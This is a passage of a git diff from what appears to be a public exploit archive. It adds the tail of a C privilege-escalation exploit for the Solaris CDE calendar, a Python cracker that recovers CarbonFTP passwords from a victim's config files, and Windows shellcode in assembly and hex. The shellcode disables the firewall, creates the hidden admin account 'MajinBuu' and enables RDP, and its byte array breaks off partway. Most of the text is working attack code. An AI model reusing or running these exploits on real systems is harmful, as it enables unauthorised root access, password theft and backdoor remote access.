sizeof(sc)); + + /* fill the envp, keeping padding */ + add_env(payload); + add_env("HOME=/tmp"); + add_env(NULL); + + /* calculate the payload address */ + payaddr = sb - OFFSET; + + /* prepare the evil palette name */ + memset(buf, 'A', sizeof(buf)); + buf[sizeof(buf) - 1] = 0x0; + + /* fill with function address in ld.so.1, saved eip, and arguments */ + for (i = 0; i < BUFSIZE - 16; i += 4) { + set_val(buf, i, ret); /* strcpy */ + set_val(buf, i += 4, rwx_mem); /* saved eip */ + set_val(buf, i += 4, rwx_mem); /* 1st argument */ + set_val(buf, i += 4, payaddr); /* 2nd argument */ + } + + /* print some output */ + fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release); + fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname); + fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb); + fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem); + fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr); + fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret); + + /* create the evil calendar file */ + fprintf(stderr, "Preparing the evil calendar file... "); + snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname); + if (system(cmd) == -1) { + perror("Error creating calendar file"); + exit(1); + } + if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) { + perror("Error creating calendar file"); + exit(1); + } + + /* prepare the evil calendar file (badchars currently not handled) */ + fp = fopen("/usr/spool/calendar/callog.hax0r", "w"); + if (!fp) { + perror("Error preparing calendar file"); + exit(1); + } + fprintf(fp, "Version: 4\n(calendarattributes " + "(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\"," + "\"10:access_list\",\"world:2\")\n"); + /* buffer overflow in calendar name */ + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," + "\"5:string\",\"%s\")\n", buf); + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," + "\"6:user\",\"fnord\")\n)"); + /* buffer overflow in calendar owner */ + /* + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\"," + "\"5:string\",\"hax0r\")\n"); + fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\"," + "\"6:user\",\"%s\")\n)", buf); + */ + fclose(fp); + + fprintf(stderr, "Done.\n"); + + /* run the vulnerable program */ + fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n"); + execve(VULN, arg, env); + perror("execve"); + exit(0); +} + +/* + * add_env(): add a variable to envp and pad if needed + */ +int add_env(char *string) +{ + int i; + + /* null termination */ + if (!string) { + env[env_pos] = NULL; + return env_len; + } + + /* add the variable to envp */ + env[env_pos] = string; + env_len += strlen(string) + 1; + env_pos++; + + /* pad the envp using zeroes */ + if ((strlen(string) + 1) % 4) + for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) { + env[env_pos] = string + strlen(string); + env_len++; + } + + return env_len; +} + +/* + * check_zero(): check an address for the presence of a 0x00 + */ +void check_zero(int addr, char *pattern) +{ + if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) || + !(addr & 0xff000000)) { + fprintf(stderr, "Error: %s contains a 0x00!\n", pattern); + exit(1); + } +} + +/* + * search_ldso(): search for a symbol inside ld.so.1 + */ +int search_ldso(char *sym) +{ + int addr; + void *handle; + Link_map *lm; + + /* open the executable object file */ + if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) { + perror("dlopen"); + exit(1); + } + + /* get dynamic load information */ + if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) { + perror("dlinfo"); + exit(1); + } + + /* search for the address of the symbol */ + if ((addr = (int)dlsym(handle, sym)) == NULL) { + fprintf(stderr, "Sorry, function %s() not found\n", sym); + exit(1); + } + + /* close the executable object file */ + dlclose(handle); + + check_zero(addr - 4, sym); + return addr; +} + +/* + * search_rwx_mem(): search for an RWX memory segment valid for all + * programs (typically, /usr/lib/ld.so.1) using the proc filesystem + */ +int search_rwx_mem(void) +{ + int fd; + char tmp[16]; + prmap_t map; + int addr = 0, addr_old; + + /* open the proc filesystem */ + sprintf(tmp,"/proc/%d/map", (int)getpid()); + if ((fd = open(tmp, O_RDONLY)) < 0) { + fprintf(stderr, "Can't open %s\n", tmp); + exit(1); + } + + /* search for the last RWX memory segment before stack (last - 1) */ + while (read(fd, &map, sizeof(map))) + if (map.pr_vaddr) + if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) { + addr_old = addr; + addr = map.pr_vaddr; + } + close(fd); + + /* add 4 to the exact address NULL bytes */ + if (!(addr_old & 0xff)) + addr_old |= 0x04; + if (!(addr_old & 0xff00)) + addr_old |= 0x0400; + + return addr_old; +} + +/* + * set_val(): copy a dword inside a buffer (little endian) + */ +void set_val(char *buf, int pos, int val) +{ + buf[pos] = (val & 0x000000ff); + buf[pos + 1] = (val & 0x0000ff00) >> 8; + buf[pos + 2] = (val & 0x00ff0000) >> 16; + buf[pos + 3] = (val & 0xff000000) >> 24; +} \ No newline at end of file diff --git a/exploits/windows/remote/48363.py b/exploits/windows/remote/48363.py new file mode 100755 index 000000000..2f30aa3ce --- /dev/null +++ b/exploits/windows/remote/48363.py @@ -0,0 +1,241 @@ +# Title: Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption +# Date: 2020-04-20 +# Author: hyp3rlinx +# Vendor: +# CVE: CVE-2020-6857 + +import time, string, sys, argparse, os, codecs + +#Fixed: updated for Python 3, the hex decode() function was not working in Python 3 version. +#This should be compatible for Python 2 and 3 versions now, tested successfully. +#Sample test password +#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947 + +key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program. +chunk_sz=5 #number of bytes we must decrypt the password by. + +#Password is stored here: +#C:\Users\\AppData\Roaming\Neowise\CarbonFTPProjects\.CFTP + +#Neowise CarbonFTP v1.4 +#Insecure Proprietary Password Encryption +#By John Page (aka hyp3rlinx) +#Apparition Security +#=================================================== + +def carbonftp_conf(conf_file): + p="" + pipe=-1 + passwd="" + lst_of_passwds=[] + try: + for p in conf_file: + idx = p.find("Password=STRING|") + if idx != -1: + pipe = p.find("|") + if pipe != -1: + passwd = p[pipe + 2: -2] + print(" Password found: "+ passwd) + lst_of_passwds.append(passwd) + except Exception as e: + print(str(e)) + return lst_of_passwds + + +def reorder(lst): + k=1 + j=0 + for n in range(len(lst)): + k+=1 + j+=1 + try: + tmp = lst[n+k] + a = lst[n+j] + lst[n+j] = tmp + lst[n+k] = a + except Exception as e: + pass + return ''.join(lst) + + +def dec2hex(dec): + tmp = str(hex(int(dec))) + return str(tmp[2:]) + + +#Updated for Python version compatibility. +def hex2ascii(h): + h=h.strip() + passwd="" + try: + passwd = codecs.decode(h, "hex").decode("ascii") + except Exception as e: + print("[!] In hex2ascii(), not a valid hex string.") + exit() + return passwd + + +def chunk_passwd(passwd_lst): + lst = [] + for passwd in passwd_lst: + while passwd: + lst.append(passwd[:chunk_sz]) + passwd = passwd[chunk_sz:] + return lst + + +def strip_non_printable_char(str): + return ''.join([x for x in str if ord(x) > 31 or ord(x)==9]) + +cnt = 0 +passwd_str="" +def deob(c): + + global cnt, passwd_str + + tmp="" + + try: + tmp = int(c) - int(key, 16) + tmp = dec2hex(tmp) + except Exception as e: + print("[!] Not a valid CarbonFTP encrypted password.") + exit() + + b="" + a="" + + #Seems we can delete the second char as its most always junk. + if cnt!=1: + a = tmp[:2] + cnt+=1 + else: + b = tmp[:4] + + passwd_str += strip_non_printable_char(hex2ascii(a + b)) + hex_passwd_lst = list(passwd_str) + return hex_passwd_lst + + +def no_unique_chars(lst): + c=0 + k=1 + j=0 + for i in range(len(lst)): + k+=1 + j+=1 + try: + a = lst[i] + b = lst[i+1] + if a != b: + c+=1 + elif c==0: + print("[!] Possible one char password?: " +str(lst[0])) + return lst[0] + except Exception as e: + pass + return False + + +def decryptor(result_lst): + + global passwd_str, sz + + print(" Decrypting ... \n") + for i in result_lst: + print("[-] "+i) + time.sleep(0.1) + lst = deob(i) + + #Re-order chars to correct sequence using custom swap function (reorder). + reordered_pass = reorder(lst) + sz = len(reordered_pass) + + #Flag possible single char password. + no_unique_chars(lst) + + print("[+] PASSWORD LENGTH: " + str(sz)) + if sz == 9: + return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-3] + " | " + reordered_pass[:-4] + " | " + + reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass) + + #Shorter passwords less then nine chars will have several candidates + #as they get padded with repeating chars so we return those. + + passwd_str="" + return reordered_pass + + +def display_cracked_passwd(sz, passwd): + if sz==9: + print("[*] PASSWORD CANDIDATES: "+ passwd + "\n") + else: + print("[*] DECRYPTED PASSWORD: "+passwd + "\n") + + +def parse_args(): + parser = argparse.ArgumentParser() + parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files") + parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password") + return parser.parse_args() + + +def main(args): + + global passwd_str, sz + victim="" + + if args.user and args.encrypted_password: + print("[!] Supply a victims username -u or single encrypted password -p, not both.") + exit() + + print("[+] Neowise CarbonFTP v1.4") + time.sleep(0.1) + print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption") + time.sleep(0.1) + print("[+] Version 2 Exploit fixed for Python 3 compatibility") + time.sleep(0.1) + print("[+] Discovered and cracked by hyp3rlinx") + time.sleep(0.1) + print("[+] ApparitionSec\n") + time.sleep(1) + + #Crack a dir of carbonFTP conf files containing encrypted passwords -u flag. + if args.user: + victim = args.user + os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/") + dir_lst = os.listdir(".") + for c in dir_lst: + f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r") + #Get encrypted password from conf file + passwd_enc = carbonftp_conf(f) + #Break up into 5 byte chunks as processed by the proprietary decryption routine. + result_lst = chunk_passwd(passwd_enc) + #Decrypt the 5 byte chunks and reassemble to the cleartext password. + cracked_passwd = decryptor(result_lst) + #Print cracked password or candidates. + display_cracked_passwd(sz, cracked_passwd) + time.sleep(0.3) + passwd_str="" + f.close() + + + #Crack a single password -p flag. + if args.encrypted_password: + passwd_to_crack_lst = [] + passwd_to_crack_lst.append(args.encrypted_password) + result = chunk_passwd(passwd_to_crack_lst) + #Print cracked password or candidates. + cracked_passwd = decryptor(result) + display_cracked_passwd(sz, cracked_passwd) + + +if __name__=="__main__": + + parser = argparse.ArgumentParser() + + if len(sys.argv)==1: + parser.print_help(sys.stderr) + exit() + + main(parse_args()) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d9e162f6a..edc85f820 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11036,6 +11036,7 @@ id,file,description,date,author,type,platform,port 48350,exploits/windows/local/48350.py,"Nsauditor 3.2.1.0 - Buffer Overflow (SEH+ASLR bypass (3 bytes overwrite))",2020-04-20,Cervoise,local,windows, 48351,exploits/windows/local/48351.py,"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)",2020-04-20,bzyo,local,windows, 48352,exploits/windows/local/48352.txt,"Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path",2020-04-20,boku,local,windows, +48359,exploits/solaris/local/48359.c,"Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation",2020-04-21,"Marco Ivaldi",local,solaris, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -18108,7 +18109,8 @@ id,file,description,date,author,type,platform,port 48338,exploits/multiple/remote/48338.rb,"Apache Solr - Remote Code Execution via Velocity Template (Metasploit)",2020-04-16,Metasploit,remote,multiple, 48343,exploits/linux/remote/48343.rb,"Nexus Repository Manager - Java EL Injection RCE (Metasploit)",2020-04-17,Metasploit,remote,linux, 48353,exploits/linux/remote/48353.rb,"Unraid 6.8.0 - Auth Bypass PHP Code Execution (Metasploit)",2020-04-20,Metasploit,remote,linux, -6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, +48363,exploits/windows/remote/48363.py,"Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption",2020-04-21,hyp3rlinx,remote,windows, +6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 53,exploits/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' 'whereami.cgi' Remote Code Execution",2003-07-10,knight420,webapps,cgi, @@ -42591,3 +42593,10 @@ id,file,description,date,author,type,platform,port 48342,exploits/hardware/webapps/48342.txt,"Cisco IP Phone 11.7 - Denial of service (PoC)",2020-04-17,"Jacob Baines",webapps,hardware, 48345,exploits/php/webapps/48345.txt,"Centreon 19.10.5 - 'id' SQL Injection",2020-04-20,"Basim Alabdullah",webapps,php, 48348,exploits/php/webapps/48348.txt,"Fork CMS 5.8.0 - Persistent Cross-Site Scripting",2020-04-20,Vulnerability-Lab,webapps,php, +48354,exploits/php/webapps/48354.txt,"CSZ CMS 1.2.7 - Persistent Cross-Site Scripting",2020-04-21,"Metin Yunus Kandemir",webapps,php, +48356,exploits/php/webapps/48356.txt,"PMB 5.6 - 'logid' SQL Injection",2020-04-21,41-trk,webapps,php, +48357,exploits/php/webapps/48357.txt,"CSZ CMS 1.2.7 - 'title' HTML Injection",2020-04-21,"Metin Yunus Kandemir",webapps,php, +48358,exploits/hardware/webapps/48358.py,"IQrouter 3.3.1 Firmware - Remote Code Execution",2020-04-21,drakylar,webapps,hardware, +48360,exploits/json/webapps/48360.txt,"NSClient++ 0.5.2.35 - Authenticated Remote Code Execution",2020-04-21,kindredsec,webapps,json, +48361,exploits/php/webapps/48361.txt,"jizhi CMS 1.6.7 - Arbitrary File Download",2020-04-21,jizhicms,webapps,php, +48362,exploits/hardware/webapps/48362.txt,"P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin)",2020-04-21,LiquidWorm,webapps,hardware, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 37f30a06b..f62afe4be 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -1019,3 +1019,4 @@ id,file,description,date,author,type,platform 48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows 48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 +48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows diff --git a/shellcodes/windows/48355.c b/shellcodes/windows/48355.c new file mode 100644 index 000000000..c18b5ac02 --- /dev/null +++ b/shellcodes/windows/48355.c @@ -0,0 +1,285 @@ +## Exploit Title: Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) +## Exploit Author: Bobby Cooke +## Date: 2020-04-20 +## Tested on: Windows 10 Home - 1909 (x86_64), Windows 10 Pro - 1909 (x86) +## Description: Windows Shellcode that disables the Windows firewall, adds the user 'MajinBuu' with password 'TurnU2C@ndy!!' to the system, adds the user 'MajinBuu' to the local groups 'Administrators' & 'Remote Desktop Users', and then enables the RDP Service. +## Commands used: +## 'netsh firewall set opmode mode=DISABLE' +## 'net user MajinBuu TurnU2C@ndy!! /add' +## 'net localgroup Administrators MajinBuu /add' +## 'net localgroup "Remote Desktop Users" MajinBuu /add' +## 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' + +; Create stack frame +mov ebp, esp +sub esp, 0x30 + +; Find kernel32.dll base address + xor ebx, ebx + mov ebx, [fs:ebx+0x30] ; EBX = Address_of_PEB + mov ebx, [ebx+0xC] ; EBX = Address_of_LDR + mov ebx, [ebx+0x1C] ; EBX = 1st entry in InitOrderModuleList / ntdll.dll + mov ebx, [ebx] ; EBX = 2nd entry in InitOrderModuleList / kernelbase.dll + mov ebx, [ebx] ; EBX = 3rd entry in InitOrderModuleList / kernel32.dll + mov eax, [ebx+0x8] ; EAX = &kernel32.dll / Address of kernel32.dll + mov [ebp-0x4], eax ; [EBP-0x04] = &kernel32.dll + +; Find the address of the Export Table within kernel32.dll + mov ebx, [eax+0x3C] ; EBX = Offset NewEXEHeader + add ebx, eax ; EBX = &NewEXEHeader + mov ebx, [ebx+0x78] ; EBX = RVA ExportTable + add ebx, eax ; EBX = &ExportTable + +; Find the address of the Name Pointer Table within kernel32.dll + mov edi, [ebx+0x20] ; EDI = RVA NamePointerTable + add edi, eax ; EDI = &NamePointerTable + mov [ebp-0x8], edi ; save &NamePointerTable to stack frame + +; Find the address of the Ordinal Table + mov ecx, [ebx+0x24] ; ECX = RVA OrdinalTable + add ecx, eax ; ECX = &OrdinalTable + mov [ebp-0xC], ecx ; save &OrdinalTable to stack-frame + +; Find the address of the Address Table + mov edx, [ebx+0x1C] ; EDX = RVA AddressTable + add edx, eax ; EDX = &AddressTable + mov [ebp-0x10], edx ; save &AddressTable to stack-frame + +; Find Number of Functions within the Export Table of kernel32.dll + mov edx, [ebx+0x14] ; EDX = Number of Functions + mov [ebp-0x14], edx ; save value of Number of Functions to stack-frame + +jmp short functions + +findFunctionAddr: +; Initialize the Counter to prevent infinite loop + xor eax, eax ; EAX = Counter = 0 + mov edx, [ebp-0x14] ; get value of Number of Functions from stack-frame +; Loop through the NamePointerTable and compare our Strings to the Name Strings of kernel32.dll +searchLoop: + mov edi, [ebp-0x8] ; EDI = &NamePointerTable + mov esi, [ebp-0x18] ; ESI = Address of String for the Symbol we are searching for + xor ecx, ecx ; ECX = 0x00000000 + cld ; clear direction flag - Process strings from left to right + mov edi, [edi+eax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] + add edi, [ebp-0x4] ; EDI = &NameString = RVA NameString + &kernel32.dll + add cx, 0xF ; ECX = len("GetProcAddress,0x00") = 15 = 14 char + 1 Null + repe cmpsb ; compare first 8 bytes of [&NameString] to "GetProcAddress,0x00" + jz found ; If string at [&NameString] == "GetProcAddress,0x00", then end loop + inc eax ; else Counter ++ + cmp eax, edx ; Does EAX == Number of Functions? + jb searchLoop ; If EAX != Number of Functions, then restart the loop + +found: +; Find the address of GetProcAddress by using the last value of the Counter + mov ecx, [ebp-0xC] ; ECX = &OrdinalTable + mov edx, [ebp-0x10] ; EDX = &AddressTable + mov ax, [ecx + eax*2] ; AX = ordinalNumber = [&OrdinalTable + (Counter*2)] + mov eax, [edx + eax*4] ; EAX = RVA GetProcAddress = [&AddressTable + ordinalNumber] + add eax, [ebp-0x4] ; EAX = &GetProcAddress = RVA GetProcAddress + &kernel32.dll + ret + +functions: +# Push string "GetProcAddress",0x00 onto the stack + xor eax, eax ; clear eax register + mov ax, 0x7373 ; AX is the lower 16-bits of the 32bit EAX Register + push eax ; ss : 73730000 // EAX = 0x00007373 // \x73=ASCII "s" + push 0x65726464 ; erdd : 65726464 // "GetProcAddress" + push 0x41636f72 ; Acor : 41636f72 + push 0x50746547 ; PteG : 50746547 + mov [ebp-0x18], esp ; save PTR to string at bottom of stack (ebp) + call findFunctionAddr ; After Return EAX will = &GetProcAddress +# EAX = &GetProcAddress + mov [ebp-0x1C], eax ; save &GetProcAddress + +; Call GetProcAddress(&kernel32.dll, PTR "LoadLibraryA"0x00) + xor edx, edx ; EDX = 0x00000000 + push edx ; null terminator for LoadLibraryA string + push 0x41797261 ; Ayra : 41797261 // "LoadLibraryA",0x00 + push 0x7262694c ; rbiL : 7262694c + push 0x64616f4c ; daoL : 64616f4c + push esp ; $hModule -- push the address of the start of the string onto the stack + push dword [ebp-0x4] ; $lpProcName -- push base address of kernel32.dll to the stack + mov eax, [ebp-0x1C] ; Move the address of GetProcAddress into the EAX register + call eax ; Call the GetProcAddress Function. + mov [ebp-0x20], eax ; save Address of LoadLibraryA + +; Call LoadLibraryA(PTR "msvcrt") +; push "msvcrt",0x00 to the stack and save pointer + xor eax, eax ; clear eax + mov ax, 0x7472 ; tr : 7472 + push eax + push 0x6376736D ; cvsm : 6376736D + push esp ; push the pointer to the string + mov ebx, [ebp-0x20] ; LoadLibraryA Address to ebx register + call ebx ; call the LoadLibraryA Function to load msvcrt.dll + mov [ebp-0x24], eax ; save Address of msvcrt.dll + +; Call GetProcAddress(msvcrt.dll, "system") + xor edx, edx + mov dx, 0x6d65 ; me : 6d65 + push edx + push 0x74737973 ; tsys : 74737973 + push esp ; push pointer to string to stack for 'system' + push dword [ebp-0x24] ; push base address of msvcrt.dll to stack + mov eax, [ebp-0x1C] ; PTR to GetProcAddress to EAX + call eax ; GetProcAddress +; EAX = WSAStartup Address + mov [ebp-0x28], eax ; save Address of msvcrt.system + +; 'netsh firewall set opmode mode=DISABLE' +xor ecx, ecx +mov cx, 0x454c ; EL : 454c +push ecx +push 0x42415349 ; BASI : 42415349 +push 0x443d6564 ; D=ed : 443d6564 +push 0x6f6d2065 ; om e : 6f6d2065 +push 0x646f6d70 ; domp : 646f6d70 +push 0x6f207465 ; o te : 6f207465 +push 0x73206c6c ; s ll : 73206c6c +push 0x61776572 ; awer : 61776572 +push 0x69662068 ; if h : 69662068 +push 0x7374656e ; sten : 7374656e +push esp ; push pointer to string +mov eax, [ebp-0x28] ; msvcrt.system address +call eax ; call system + +; 'net user MajinBuu TurnU2C@ndy!! /add' +xor ecx, ecx +push ecx +push 0x6464612f ; dda/ : 6464612f +push 0x20212179 ; !!y : 20212179 +push 0x646e4043 ; dn@C : 646e4043 +push 0x32556e72 ; 2Unr : 32556e72 +push 0x75542075 ; uT u : 75542075 +push 0x75426e69 ; uBni : 75426e69 +push 0x6a614d20 ; jaM : 6a614d20 +push 0x72657375 ; resu : 72657375 +push 0x2074656e ; ten : 2074656e +push esp ; push pointer to string +mov eax, [ebp-0x28] ; msvcrt.system address +call eax ; call system + +; 'net localgroup Administrators MajinBuu /add' +xor ecx, ecx +push ecx +mov ecx, 0x64646190 ; dda : 646461 +shr ecx, 8 +push ecx +push 0x2f207575 ; / uu : 2f207575 +push 0x426e696a ; Bnij : 426e696a +push 0x614d2073 ; aM s : 614d2073 +push 0x726f7461 ; rota : 726f7461 +push 0x72747369 ; rtsi : 72747369 +push 0x6e696d64 ; nimd : 6e696d64 +push 0x41207075 ; A pu : 41207075 +push 0x6f72676c ; orgl : 6f72676c +push 0x61636f6c ; acol : 61636f6c +push 0x2074656e ; ten : 2074656e +push esp ; push pointer to string +mov eax, [ebp-0x28] ; msvcrt.system address +call eax ; call system + +; 'net localgroup "Remote Desktop Users" MajinBuu /add' +xor ecx, ecx +push ecx +mov ecx, 0x64646190 ; dda : 646461 +shr ecx, 8 +push ecx +push 0x2f207575 ; / uu : 2f207575 +push 0x426e696a ; Bnij : 426e696a +push 0x614d2022 ; aM " : 614d2022 +push 0x73726573 ; sres : 73726573 +push 0x5520706f ; U po : 5520706f +push 0x746b7365 ; tkse : 746b7365 +push 0x44206574 ; D et : 44206574 +push 0x6f6d6552 ; omeR : 6f6d6552 +push 0x22207075 ; " pu : 22207075 +push 0x6f72676c ; orgl : 6f72676c +push 0x61636f6c ; acol : 61636f6c +push 0x2074656e ; ten : 2074656e +push esp ; push pointer to string +mov eax, [ebp-0x28] ; msvcrt.system address +call eax ; call system + +; 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' +xor ecx, ecx +push ecx +push 0x662f2030 ; f/ 0 : 662f2030 +push 0x20642f20 ; d/ : 20642f20 +push 0x44524f57 ; DROW : 44524f57 +push 0x445f4745 ; D_GE : 445f4745 +push 0x5220742f ; R t/ : 5220742f +push 0x20736e6f ; sno : 20736e6f +push 0x69746365 ; itce : 69746365 +push 0x6e6e6f43 ; nnoC : 6e6e6f43 +push 0x5354796e ; STyn : 5354796e +push 0x65446620 ; eDf : 65446620 +push 0x762f2022 ; v/ " : 762f2022 +push 0x72657672 ; revr : 72657672 +push 0x6553206c ; eS l : 6553206c +push 0x616e696d ; anim : 616e696d +push 0x7265545c ; reT\ : 7265545c +push 0x6c6f7274 ; lort : 6c6f7274 +push 0x6e6f435c ; noC\ : 6e6f435c +push 0x7465536c ; teSl : 7465536c +push 0x6f72746e ; ortn : 6f72746e +push 0x6f43746e ; oCtn : 6f43746e +push 0x65727275 ; erru : 65727275 +push 0x435c4d45 ; C\ME : 435c4d45 +push 0x54535953 ; TSYS : 54535953 +push 0x5c454e49 ; \ENI : 5c454e49 +push 0x4843414d ; HCAM : 4843414d +push 0x5f4c4143 ; _LAC : 5f4c4143 +push 0x4f4c5f59 ; OL_Y : 4f4c5f59 +push 0x454b4822 ; EKH" : 454b4822 +push 0x20646461 ; dda : 20646461 +push 0x20676572 ; ger : 20676572 +push esp ; push pointer to string +mov eax, [ebp-0x28] ; msvcrt.system address +call eax ; call system + + +###################################################################################### +#include +#include + +char code[] = \ +"\x89\xe5\x83\xec\x30\x31\xdb\x64\x8b\x5b\x30\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x1b" +"\x8b\x43\x08\x89\x45\xfc\x8b\x58\x3c\x01\xc3\x8b\x5b\x78\x01\xc3\x8b\x7b\x20\x01\xc7" +"\x89\x7d\xf8\x8b\x4b\x24\x01\xc1\x89\x4d\xf4\x8b\x53\x1c\x01\xc2\x89\x55\xf0\x8b\x53" +"\x14\x89\x55\xec\xeb\x32\x31\xc0\x8b\x55\xec\x8b\x7d\xf8\x8b\x75\xe8\x31\xc9\xfc\x8b" +"\x3c\x87\x03\x7d\xfc\x66\x83\xc1\x0f\xf3\xa6\x74\x05\x40\x39\xd0\x72\xe4\x8b\x4d\xf4" +"\x8b\x55\xf0\x66\x8b\x04\x41\x8b\x04\x82\x03\x45\xfc\xc3\x31\xc0\x66\xb8\x73\x73\x50" +"\x68\x64\x64\x72\x65\x68\x72\x6f\x63\x41\x68\x47\x65\x74\x50\x89\x65\xe8\xe8\xb0\xff" +"\xff\xff\x89\x45\xe4\x31\xd2\x52\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f" +"\x61\x64\x54\xff\x75\xfc\x8b\x45\xe4\xff\xd0\x89\x45\xe0\x31\xc0\x66\xb8\x72\x74\x50" +"\x68\x6d\x73\x76\x63\x54\x8b\x5d\xe0\xff\xd3\x89\x45\xdc\x31\xd2\x66\xba\x65\x6d\x52" +"\x68\x73\x79\x73\x74\x54\xff\x75\xdc\x8b\x45\xe4\xff\xd0\x89\x45\xd8\x31\xc9\x66\xb9" +"\x4c\x45\x51\x68\x49\x53\x41\x42\x68\x64\x65\x3d\x44\x68\x65\x20\x6d\x6f\x68\x70\x6d" +"\x6f\x64\x68\x65\x74\x20\x6f\x68\x6c\x6c\x20\x73\x68\x72\x65\x77\x61\x68\x68\x20\x66" +"\x69\x68\x6e\x65\x74\x73\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\x68\x2f\x61\x64\x64\x68" +"\x79\x21\x21\x20\x68\x43\x40\x6e\x64\x68\x72\x6e\x55\x32\x68\x75\x20\x54\x75\x68\x69" +"\x6e\x42\x75\x68\x20\x4d\x61\x6a\x68\x75\x73\x65\x72\x68\x6e\x65\x74\x20\x54\x8b\x45" +"\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68\x75\x75\x20\x2f\x68" +"\x6a\x69\x6e\x42\x68\x73\x20\x4d\x61\x68\x61\x74\x6f\x72\x68\x69\x73\x74\x72\x68\x64" +"\x6d\x69\x6e\x68\x75\x70\x20\x41\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65" +"\x74\x20\x54\x8b\x45\xd8\xff\xd0\x31\xc9\x51\xb9\x90\x61\x64\x64\xc1\xe9\x08\x51\x68" +"\x75\x75\x20\x2f\x68\x6a\x69\x6e\x42\x68\x22\x20\x4d\x61\x68\x73\x65\x72\x73\x68\x6f" +"\x70\x20\x55\x68\x65\x73\x6b\x74\x68\x74\x65\x20\x44\x68\x52\x65\x6d\x6f\x68\x75\x70" +"\x20\x22\x68\x6c\x67\x72\x6f\x68\x6c\x6f\x63\x61\x68\x6e\x65\x74\x20\x54\x8b\x45\xd8" +"\xff\xd0\x31\xc9\x51\x68\x30\x20\x2f\x66\x68\x20\x2f\x64\x20\x68\x57\x4f\x52\x44\x68" 